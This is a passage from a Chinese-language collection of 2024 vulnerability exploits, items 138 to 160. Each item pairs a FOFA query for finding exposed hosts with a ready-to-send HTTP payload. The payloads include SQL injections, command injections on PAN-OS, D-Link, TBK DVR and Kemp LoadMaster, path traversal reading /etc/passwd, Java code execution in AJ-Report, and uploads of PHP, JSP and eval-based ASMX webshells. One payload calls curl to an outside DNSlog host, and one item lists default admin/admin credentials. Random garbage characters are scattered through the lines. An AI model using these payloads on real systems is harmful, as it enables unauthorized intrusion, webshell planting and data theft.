Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 @; A) `3 h9 |
Accept-Encoding: gzip, deflate, br' A' B, [! ^- I# f$ D7 z
Connection: close
+ F0 g) s! C5 k# nCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
6 b8 g4 U8 ^- Y5 w" T5 tUpgrade-Insecure-Requests: 1
5 }# B, L1 u! s0 {; f" Z
9 s) f; c1 {1 H. W5 R
) y7 p8 R) k5 \, Q, w  u138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
3 B2 t8 ^0 \* uCVE-2024-2621, M3 A# p7 \: b
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
4 a. z/ z" R2 S' Z# W) f/ i+ nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
0 g) W( R3 X( i4 J% tHost: x.x.x.x
" K: _% Q1 ?, C, bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, E1 M* l1 r7 V% h6 E: Y  {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% U" y" j: ?! u2 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 |* B7 N. i5 p3 o- S
Accept-Encoding: gzip, deflate, br- o- H# D3 z4 M
Connection: close2 M$ ^1 I6 x; g8 x2 h- m0 N
Upgrade-Insecure-Requests: 1! p/ B7 |4 u, H# z3 R0 v' f1 k4 L" y

8 N* d9 g' s! N5 z( V8 ?" |' A
' Q* s+ B! v& d9 N8 I7 d139. 福建科立讯通信指挥调度平台editemedia.php sql注入" p& w; v+ n6 @. b+ O: t. K
CVE-2024-2622
/ K! f# ]) F" pFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 m, w- y, n" c' }GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
7 B9 p" y) w8 v, y& E. u& BHost: x.x.x.x
9 k+ B' ~6 @$ l4 T: A3 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& Z8 {4 U# P: }5 u+ d. A% _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ b( m8 Q3 Z2 W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ E) ~) B( _7 k) k1 }- n- z: {Accept-Encoding: gzip, deflate, br5 V- R+ k3 F# B% A2 O! S
Connection: close
/ \8 v5 c; l$ M/ _; c0 p' ACookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
6 K" T) P. g8 |; t# }& nUpgrade-Insecure-Requests: 1- z! ]6 F3 W6 K. }# ^

2 g/ X& \3 j9 a- s; }5 V7 H3 m3 w) f7 @
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入9 i8 z8 T8 K4 ]$ W+ |6 F! F' L
CVE-2024-2566
! }* u1 ~; K$ @* N3 f& bFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"* N6 v1 Y( S2 H) c8 N9 I7 w( w
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1: {+ `7 S% w# k% W' H9 \) T
Host: x.x.x.x  N& T' o! u* {2 L5 u& M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
3 [- ?9 g7 m9 \5 a$ Q1 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# U1 p% t! G. A* \+ NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& ^/ ?' a, `: ?8 NAccept-Encoding: gzip, deflate, br+ g- i$ e3 t# \2 m0 i
Connection: close2 u. k. }( e, \5 [/ Q& q
Cookie: authcode=h8g9
1 y" r8 N1 P/ e+ {Upgrade-Insecure-Requests: 15 x% x) _6 _- `" f& I# B) A

" E6 @! @7 F) \( i6 X" W( n8 ]5 s8 \% j# \
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
. A7 r! u/ G- U# o  B/ JFOFA:body="指挥调度管理平台"
) X5 V9 H( N3 v, z5 j4 j5 ~- KPOST /app/ext/ajax_users.php HTTP/1.1& j' p: [: X0 T2 V4 C& T9 x! \
Host: your-ip7 F# _. y; D5 o! A1 n, V  m/ z
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info; k& J) N2 h3 s
Content-Type: application/x-www-form-urlencoded
% q- c6 t- |, u
2 U# f9 I5 _. F" V, N8 T# X# c  T" ^2 m
" l- |0 q, S6 b, x1 _dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -) _* ~. X6 W* S0 H; d' \8 h

: t6 y3 q* Q7 P/ f/ |
1 H! K; [; U& Z# [0 k9 e- W142. CMSV6车辆监控平台系统中存在弱密码: U& r3 u$ `1 f  I! ^$ _; G! K8 p
CVE-2024-29666
0 x. X% P$ D' b: `# uFOFA:body="/808gps/"( E2 j4 [! F6 y; ]6 X
admin/admin
( g4 N: r8 i8 }; s' W! [6 x143. Netis WF2780 v2.1.40144 远程命令执行
  F2 v4 S) L8 _- S4 e' U2 J4 gCVE-2024-25850
# h, Z9 @) f3 O5 sFOFA:title='AP setup' && header='netis'
/ ^6 n" R" Y. W- RPAYLOAD# `7 e0 M$ M0 x& }# L& |
/ n5 j' L1 D3 }8 g. ~
144. D-Link nas_sharing.cgi 命令注入( y; m% G' N0 {; _4 O
FOFA:app="D_Link-DNS-ShareCenter"
% m9 j9 l- C; }! A2 Y5 Qsystem参数用于传要执行的命令& I- H  }8 P  B6 S1 P  F1 d
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.12 Z- x9 K& T+ ^3 I
Host: x.x.x.x1 R8 l  z& _: [# ~! l  w! c3 a
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
+ A/ Z5 f3 ?0 S- F; Y& fConnection: close
1 e! I9 z2 t: c0 ~3 x$ R! d% ~Accept: */*
" R! P$ g! Y! A- m# KAccept-Language: en/ @+ v6 X6 m( G1 M9 V3 \
Accept-Encoding: gzip
- V9 t) Z( A3 T' j5 A* y% Y* I: f, D. X! b; U3 Q  ]4 P
% T% e* ~" k. E1 w& n# @$ D0 W: i' w
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
- k3 [7 U1 P' h0 v+ HCVE-2024-3400
; f. q: ?0 B3 r# q5 T; v7 g  x/ O: Q5 B# qFOFA:icon_hash="-631559155"9 U1 c9 u+ M0 f+ q. q4 Q
GET /global-protect/login.esp HTTP/1.1
* y# x: q/ F8 B, K+ A1 v/ NHost: 192.168.30.112:1005
* I$ g" v0 D* V5 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
! C( B9 X1 P6 g; d  V( ~Connection: close
; E! D9 r7 s- u( _% h0 ?' HCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;) {$ @  _3 ?* ~6 h) \
Accept-Encoding: gzip
6 |$ l1 ~/ w) b( T( [! }% n
( W  p& k* j' @4 z- J2 ]  c( |
% \' c& Y; V5 t% F146. MajorDoMo thumb.php 未授权远程代码执行
3 s  }6 h( X5 y3 sCNVD-2024-02175# ~1 o, w- n* h/ y8 b4 ]! I% K
FOFA:app="MajordomoSL"
7 S  q  ?7 \& a+ B# oGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
: K' u" J7 n# S2 ^; v7 t: KHost: x.x.x.x" Y/ F. X* F5 y) c3 M. h& Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
  }& J0 b3 @9 u& x$ L! _0 yAccept-Charset: utf-84 L% J. q0 O( U: l) W
Accept-Encoding: gzip, deflate$ f) o' U3 n" }: c, Z
Connection: close
& Y, n4 J0 T8 D5 ]  t- g( p. P" U  f8 e; @( Z

6 H* {5 F7 {! Z- ~147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
3 C  a* f! {3 xCVE-2024-32399) I- A& i( W1 Y; e/ p
FOFA:body="RaidenMAILD"3 i3 J  E0 A+ j3 i; c0 B
GET /webeditor/../../../windows/win.ini HTTP/1.1
! w7 Q1 O& k) CHost: 127.0.0.1:81. d9 [0 {; v8 h
Cache-Control: max-age=06 R1 _& [$ Q& J1 C. H  E
Connection: close
% B' k* ~, ?$ M7 o0 K, y1 e) F5 B5 w8 a! r( b& Y
$ a/ }  S  [( S+ r! {) X  z, K
148. CrushFTP 认证绕过模板注入
& A( B/ ^) `, v% w0 q; p7 ^1 x  fCVE-2024-40400 C, V$ L) g6 i& W! v# q
FOFA:body="CrushFTP"6 ~+ H4 e5 U4 |% C6 O& u
PAYLOAD
# [/ O0 H4 q/ i# U! l0 B! O" Q) L0 h" Q
149. AJ-Report开源数据大屏存在远程命令执行  D/ Q+ \8 n) f2 f& L0 s! R- o$ I
FOFA:title="AJ-Report"
' \* x5 i3 l  `) f" E$ J" Y4 F+ `8 M- ^0 @" B
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
8 V' C( h9 s0 T$ }+ a8 I  T8 ZHost: x.x.x.x
! {+ J$ f0 [8 C4 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 {2 J* c# q# u; i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ v5 N+ \) X# @& m
Accept-Encoding: gzip, deflate, br# ~4 o& X2 Y; z7 \: z  @
Accept-Language: zh-CN,zh;q=0.9+ o9 U% v; q) ~  |7 X5 n3 Y" Q
Content-Type: application/json;charset=UTF-8% p) B8 W: z2 @' n  I
Connection: close
' L7 c( v- d3 G% n% z0 k5 b* l2 Y( E5 [$ @/ S6 H
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}- p: M) A8 V- M$ g4 j
. P" M& {5 f5 D: N2 C6 e( r
150. AJ-Report 1.4.0 认证绕过与远程代码执行2 v+ v  ?: _5 H4 B
FOFA:title="AJ-Report"9 J* j; ^4 d6 P% q
POST /dataSetParam/verification;swagger-ui/ HTTP/1.11 ~# }1 o, p# o! O& w+ A$ I2 j0 @- w: a3 g
Host: x.x.x.x
. Z; p% o  I( X) n5 c+ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" C' }; v, s2 S% e/ zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& M4 }5 b8 z( y* m! R0 sAccept-Encoding: gzip, deflate, br/ s, P6 |3 Y; ?
Accept-Language: zh-CN,zh;q=0.9
; e6 G: l$ S8 @9 P' A9 q1 QContent-Type: application/json;charset=UTF-8
! O- k0 d1 S1 s1 I5 |Connection: close
$ ]7 E! v0 p! G0 v* v( y, \4 xContent-Length: 339% z: R8 z/ g- {4 M: P* K& p0 E
, s" P! b! _; ^* P7 h) c
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}. p- |" s" l: c

3 X& a% J1 [* @: L% ]% i+ r) ^  p' \/ W! B. c# ]7 P6 i
151. AJ-Report 1.4.1 pageList sql注入
8 O7 a  E/ a5 n# f$ |FOFA:title="AJ-Report"3 Q+ o# \, H9 {* C; S+ O8 u
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1; u0 C6 ]7 d/ ]: `3 N
Host: x.x.x.x
( j4 d) p- L4 j' e1 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. ^3 l+ t& E+ L& ^1 @Connection: close
8 t9 Y. z+ V$ f- E1 CAccept-Encoding: gzip
7 Y) Y5 Z& J: {0 \. B+ c% ]
# ^4 h; ]" {/ |% v' s8 Y, j) _1 D/ V; H( [8 v/ n
152. Progress Kemp LoadMaster 远程命令执行  T5 d, s  b% L
CVE-2024-1212
, F- V6 [' n! [LoadMaster <= 7.2.59.2 (GA)
, [2 G" z9 s$ zLoadMaster<=7.2.54.8 (LTSF)
7 X  B" @6 l, J6 eLoadMaster <= 7.2.48.10 (LTS)% O- w7 B8 N/ o9 C0 e
FOFA:body="LoadMaster". [! G) w7 m6 A% U. f" }
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码/ Z. o8 T" \* B2 X  p) m
GET /access/set?param=enableapi&value=1 HTTP/1.1, [$ g( F% _) c4 Z5 o
Host: x.x.x.x
& b5 t' a7 Z. d8 W. c1 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.17 k' |4 T7 p* ?) Z
Connection: close2 U3 i( {" p" Q' f
Accept: */*8 ?, h$ C+ _" S4 n. i) S
Accept-Language: en
; w' v6 o' h9 J; h  yAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
5 @4 B0 a3 X+ g( f$ G! g: [- C  {, CAccept-Encoding: gzip: a4 B4 Z4 b1 a" E1 O0 s' X8 T
2 I; ^: y& p1 `+ |3 E' g6 i0 _" l

% E4 l6 D8 P4 f6 C6 @3 g6 o. Q153. gradio任意文件读取6 X( s8 v! d8 e& A) j3 _: v
CVE-2024-1561FOFA:body="__gradio_mode__"% H2 u3 ?! T" }% W9 v# I3 L
第一步,请求/config文件获取componets的id
' U. a% m/ ]$ J$ M2 P0 K7 K0 S* Hhttp://x.x.x.x/config
( _( q: C& U& b1 ]5 t7 d& x; B: V# L, C% M1 D
# T8 Q& K$ E5 Y5 J/ ?/ k( S. {9 A9 a) k
第二步,将/etc/passwd的内容写入到一个临时文件
1 U7 H5 T! f8 B  `POST /component_server HTTP/1.1' B" O2 I) o, {3 T, L- n
Host: x.x.x.x
  A: ~& j4 r& Y+ |/ s$ {/ \+ ~7 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
6 O: Q8 E3 m8 J  ~- r% R9 V% _Connection: close
* q% ?2 i5 {* h0 B8 O/ CContent-Length: 1156 b. j: n( w( l0 d, b  I' t, \0 |1 J
Content-Type: application/json: l; t  |2 X: W4 ~0 g
Accept-Encoding: gzip, B" D; }$ s2 K4 j, a: z

0 N! F) W) z3 k{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
3 B0 N* m5 `1 m+ p& ?" G. _6 y- [1 B/ A' s

+ D3 Z9 F$ [7 J/ ?" M2 t第三步访问
* g4 ]0 B- M* B" ohttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd3 _; V) A3 h7 K0 f. }
7 s" K' _) H) d% a8 U9 \% ?

$ }$ x/ K/ N/ Q154. 天维尔消防救援作战调度平台 SQL注入
# ^- E% T9 d: I& R* m! wCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
, U( i0 @1 n/ W3 h% t3 z2 `POST /twms-service-mfs/mfsNotice/page HTTP/1.15 i! l. k+ S% z1 n0 M; R1 z
Host: x.x.x.x
& w& ]7 Y; G% b' V* DContent-Length: 1060 l* w; ~* {7 n. J$ U- g: q
Cache-Control: max-age=0
! H2 A% ?. Y) BUpgrade-Insecure-Requests: 1
9 t9 ~* n2 F: i6 |( C; d- qOrigin: http://x.x.x.x* J- N. `# B& a2 V2 K' v
Content-Type: application/json; |3 H) Q/ b  Q' S& J; x  E$ ^# `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36. _8 b$ p3 \4 F+ u% T8 o' j7 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 \! W/ K% m4 ~3 v, h; X+ |# E+ z+ w& GReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
0 u% k8 h8 L# m! lAccept-Encoding: gzip, deflate
2 @- G/ }) \$ jAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.75 c7 q5 x+ x: `, u# o8 F; ~* P* r
Connection: close
/ Y* s: A0 v. P$ y5 B7 N! }/ W# D
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}! H1 A- k* z/ p  _6 \

  v: P) m" T1 W! k, n
8 R* I- n( Y8 w) w! k* x155. 六零导航页 file.php 任意文件上传
# B* O* H' N6 LCVE-2024-349829 h! W/ @3 w8 M& Y$ U0 i
FOFA:title=="上网导航 - LyLme Spage"
% c6 S: h  Y$ y6 b( X; \* CPOST /include/file.php HTTP/1.10 z! R, N) L! _9 C+ P
Host: x.x.x.x; F  k/ [# `9 ~* ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0; w. X1 ?/ x9 d9 h+ x9 }
Connection: close
8 a9 n8 f1 e% d5 t; j, B. s7 w, hContent-Length: 232
4 l: {/ h# o7 t$ yAccept: application/json, text/javascript, */*; q=0.01
5 G; D! o& T- }Accept-Encoding: gzip, deflate, br
+ n, K9 o/ m6 R1 b1 y" V6 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 U5 `) E9 O& t6 d& ^2 f5 I5 {
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
( O$ d  S( x+ f8 R' F+ KX-Requested-With: XMLHttpRequest( x+ t, a) {7 l3 w* N3 x# C; |
( o1 L, G9 A7 e; D: K5 N
-----------------------------qttl7vemrsold314zg0f( Z  ~* ?2 P; L" c
Content-Disposition: form-data; name="file"; filename="test.php"
' J9 k3 m6 F$ D. w. Z1 U& PContent-Type: image/png) ^4 C4 l# @9 o5 e4 n9 Y2 [

9 o* I- ~- v" {( k/ {7 Z  O8 v) K<?php phpinfo();unlink(__FILE__);?>
% H3 _8 g$ o/ @, J-----------------------------qttl7vemrsold314zg0f--
, {- o' {# u; K' O. y) t
: E' r* Y+ Y6 Q  f
- s. d* u; k0 s! h5 Y; e1 U访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
2 V- X8 A1 V) i  ?& h6 |
/ o, }- Y9 {9 C! q156. TBK DVR-4104/DVR-4216 操作系统命令注入- W" ?8 f+ ~( w
CVE-2024-3721% S1 M3 U# c. ^3 D5 M; T4 x
FOFA:"Location: /login.rsp"8 N$ g* [; _. H
·TBK DVR-4104
3 o7 U8 M3 k# F2 S$ G·TBK DVR-42161 J  G$ f) [, v! q
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1": K. x* h- {- J5 ?8 Q- D9 L4 Z
  m0 U2 I6 o; p  b& H2 p! r

/ f, l3 E, |' Z6 `% o4 a0 c8 OPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
+ V2 n+ P- O  o8 T! X' K7 B6 gHost: x.x.x.x7 S3 v3 X0 H. X# }1 ^
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ C2 @. K' v, Z% DConnection: close
: [6 A3 F3 E0 Y2 _( w/ h1 ~Content-Length: 0
+ I- P; W% S8 a4 I# k: LCookie: uid=1. Q; I% }8 }7 Q$ k3 ~, X1 \& a
Accept-Encoding: gzip! v! e, n8 |9 ^* p$ E
- l+ _& j: y8 a7 J6 x& h

$ p, m3 R( o1 y3 i157. 美特CRM upload.jsp 任意文件上传
- T* n$ C% [9 H$ K% [* dCNVD-2023-06971$ S. k- x% S( G7 \
FOFA:body="/common/scripts/basic.js"
! v2 Z- }/ ~: IPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1& P/ Z& c5 O' b* H" q% U" G
Host: x.x.x.x
3 {+ p# U" S2 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
# L3 [, y2 L% Q/ k# xContent-Length: 709' o% l3 t5 y- h- e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ U. V4 b* m% M4 R' [2 ~- f7 yAccept-Encoding: gzip, deflate2 k8 H/ G: u6 K
Accept-Language: zh-CN,zh;q=0.9
# j  w% O, v1 Z1 A. c* _) E) C, yCache-Control: max-age=08 p* [: I, b7 P; }3 ^0 f9 Q
Connection: close- k/ n  l+ m7 `2 }' t  |; E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
# @0 Z( d- X' c% P/ ]$ `& XUpgrade-Insecure-Requests: 13 B9 }) T5 y$ H+ W

8 ^, c) F. U5 u. l: z( h$ B------WebKitFormBoundary1imovELzPsfzp5dN
4 @9 k. o' L+ e9 w. b2 PContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"8 X" }* i- f$ l% b
Content-Type: application/octet-stream
+ K; l: I# j! [4 [- g( n! [+ ]6 {
4 |* D; X. s, h& f1 {1 ~( Bnyhelxrutzwhrsvsrafb
$ q8 E& g* m4 f1 e------WebKitFormBoundary1imovELzPsfzp5dN
# ?+ L. O5 _/ P1 q+ L5 hContent-Disposition: form-data; name="key", Z% {7 s" \+ k4 q, G

: J1 S/ c, B* W1 x0 Ynull% K0 w$ a& O( \
------WebKitFormBoundary1imovELzPsfzp5dN( n' R: R$ c$ j( c1 Y5 S7 k
Content-Disposition: form-data; name="form"  D  {; k3 @7 g- U7 x

1 L. q3 U( d2 N7 l+ cnull% q! E. `2 P& l7 r3 d  E  a
------WebKitFormBoundary1imovELzPsfzp5dN
4 ^6 k' _1 [  C2 DContent-Disposition: form-data; name="field"
  N8 S6 N( ~* |0 A* Z1 w# q2 q) }3 C9 F* I  Z
null- u8 x) F) A* J9 b  L8 t
------WebKitFormBoundary1imovELzPsfzp5dN
6 U" W' |. Z) y" R  ZContent-Disposition: form-data; name="filetitile"6 v  @0 g' P( I: @
$ I- b& f' t3 w0 S0 J
null
5 V' d: l1 A3 K7 E. {------WebKitFormBoundary1imovELzPsfzp5dN& U0 g6 {1 W9 ?8 E; V2 `
Content-Disposition: form-data; name="filefolder"
3 C+ e) f$ m6 F& `# s* {& T! V9 p* W  Q) J0 c
null" L6 j+ Z& b% }& v7 Z7 O# s- B
------WebKitFormBoundary1imovELzPsfzp5dN--
5 q# E1 S8 E! Z) ~3 l+ ~4 h$ X% b' P! x+ w( Q0 _" {3 T) W
- ]9 X( _2 R0 {8 O4 u
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
: h. e; r2 D0 H1 M4 R7 O0 o
$ d) l3 A( J. x- F3 `" e- i; y+ m158. Mura-CMS-processAsyncObject存在SQL注入& X4 ~3 c. S- I6 R& t
CVE-2024-32640
6 a: l. J+ }& d8 c- c$ AFOFA:"Generator: Masa CMS"' ?$ A/ V2 m) _. y: D  J2 l
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
, G9 \4 h0 N0 s6 I: A$ jHost: {{Hostname}}
/ ~1 I/ A, F* K' U6 A+ WContent-Type: application/x-www-form-urlencoded; _8 U& s4 ?6 V" q( S7 I: X
. @( b7 w% K% K4 c8 C
object=displayregion&contenthistid=x\'&previewid=1
  w% V3 r% M( A; X6 R8 ~7 q7 E$ g
! A$ i' c, P0 @7 `' d9 m; r! O; s9 o6 k
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传9 [8 H+ Q' O# u+ m6 D
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
( F! l, `0 }, }( j1 V- |0 `POST /webservices/WebJobUpload.asmx HTTP/1.11 R3 e1 a1 A9 G; Z+ O/ D6 [, E
Host: x.x.x.x
: P# ^' m, ^  x# p8 {7 f' lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  N' _, P; o) r5 i% l/ y7 gContent-Length: 1080( Y5 t& D' H5 ^( s% K
Accept-Encoding: gzip, deflate" D8 J% S4 M8 ~8 O0 W/ Y
Connection: close; I) A4 o6 B6 R- a0 Z
Content-Type: text/xml; charset=utf-8
8 L. d/ y  b; j) L' l+ zSoapaction: "http://rainier/jobUpload"
" s, o  E0 L" A. H; `) D3 z. Y, R! B2 \1 t
<?xml version="1.0" encoding="utf-8"?>
, j* B3 ~( I7 e% z3 r<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">. d- t! r% r/ w1 x- b  L
<soap:Body>
# F- ~( i# |1 ^0 @' z/ a<jobUpload xmlns="http://rainier">) D9 Q; B) a+ |! c
<vcode>1</vcode>
* c: W: G1 c! r* `# c# h9 P6 B<subFolder></subFolder>
5 f4 k8 x9 z1 e7 L% }<fileName>abcrce.asmx</fileName>6 l' O* ]. O: J
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
# h0 J! {4 k2 y% l, y8 ]" Y* v, Y</jobUpload>
# Y3 E# X/ x% Z; f% M$ U, W2 c</soap:Body>' K5 p* S+ ]! b$ u6 D" `
</soap:Envelope>
. M/ t/ ^: S9 z9 g: @3 x3 G; c5 U. D8 z+ |0 t
2 Y- g2 `9 Z& z- Y
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
+ b% Z/ ~' ^8 n$ \8 H5 Y/ P) e  m. C* I' S8 }! T1 ?

. ^5 ]! l4 `9 Q5 k. s0 t/ s160. Sonatype Nexus Repository 3目录遍历与文件读取
: S! T9 y/ |' [CVE-2024-4956
